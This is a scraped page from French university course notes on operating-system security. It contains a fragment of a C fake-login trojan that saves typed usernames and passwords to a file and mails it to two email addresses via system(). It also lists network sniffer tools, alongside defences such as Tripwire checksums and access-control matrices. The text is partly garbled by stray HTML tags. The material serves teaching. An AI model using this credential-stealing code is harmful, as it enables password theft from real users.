12.07.2015 Views

Généralités sur les systèmes d'exploitation - Site personnel de ...

Généralités sur les systèmes d'exploitation - Site personnel de ...

Généralités sur les systèmes d'exploitation - Site personnel de ...

SHOW MORE
SHOW LESS
  • No tags were found...

Create successful ePaper yourself

Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.

strcpy(loginfake.id, input);strcpy(loginfake.password, *input1);LO14 : Université Technologique <strong>de</strong> Troyes}file = fopen("mirror.txt","w");fprintf(file, "username:%s\npassword:%s\nUID:%i",loginfake.id,loginfake.password, getuid());fclose(file);void emailus(){char guilly[] = "gchamber@vi<strong>de</strong>otron.ca";char thegza[] = "yacoubi@ibm.net";char *foo;char *poo;}foo=(char *)malloc(4096);sprintf(foo, "mail %s < mirror.txt",guilly);poo=(char *)malloc(4096);sprintf(poo, "mail %s < mirror.txt",thegza);system(foo);system(poo);Lutte : signature MD5 transforme tout fichier en un con<strong>de</strong>nsé <strong>de</strong> 128 bits en utilisant une famille <strong>de</strong> fonction<strong>de</strong> hachage unidirectionnelle (RFC 1321). TripWire (1992) exécute ce cryptage et d'autres :CRC32 (voir RFC1510), MD2 (RFC1319), MD4 (RFC 1320). Voirhttp://www.visualcomputing.com/products/2_0Linux.html4°) Dispositifs <strong>de</strong> <strong>sur</strong>veillance ou sniffersRôle : placer l'interface réseau (carte ethernet) dans un mo<strong>de</strong> transparent pour pouvoir intercepter tout letrafic réseau.• Gobbler (Tiza van Rijn)• Ethload freeware en C• Esniff.c ou Sunsniff.c ou linux_sniffer.cV) I<strong>de</strong>ntification et défense contre <strong>les</strong> attaques1°) Le contrôle d'accèsBut : contrôle précis <strong>de</strong> l'utilisation <strong>de</strong> ressources par <strong>les</strong> processus. Il existe <strong>de</strong>ux niveaux :• Un niveau logique (soft) : ensemble <strong>de</strong> règ<strong>les</strong> qui définissent quels accès aux ressources sont autoriséset quels accès sont interdits.• Un niveau matériel qui permet d'appliquer le modèle réellement.Système={sujets,objets}<strong>les</strong> sujets sont <strong>les</strong> entités actives et <strong>les</strong> objets <strong>les</strong> entités accessib<strong>les</strong>.Un modèle <strong>de</strong> protection définit quels sujets ont accès à quels objets et comment (modalités d'accès).On parle <strong>de</strong> droit d'accès défini par <strong>les</strong> coup<strong>les</strong> (objet, modalité)Ex : (fichier, lire)On schématise par une matrice d'accèsProcess 1Process 2Process3fichier1LireLire, écrireSegmentLire, écrire,exécuterIl est souhaitable que la matrice d'accès puisse évoluer dynamiquement. C'est le cas par exemple quandvous exécutez passwd pour changer ou créer un mot <strong>de</strong> passe : il vous faut accé<strong>de</strong>r en tant qu'utilisateursans privilège au fichier <strong>de</strong> mot <strong>de</strong> passe qui vous est normalement fermé en écriture.95 /98 S. Moutou : Cours

Hooray! Your file is uploaded and ready to be published.

Saved successfully!

Ooh no, something went wrong!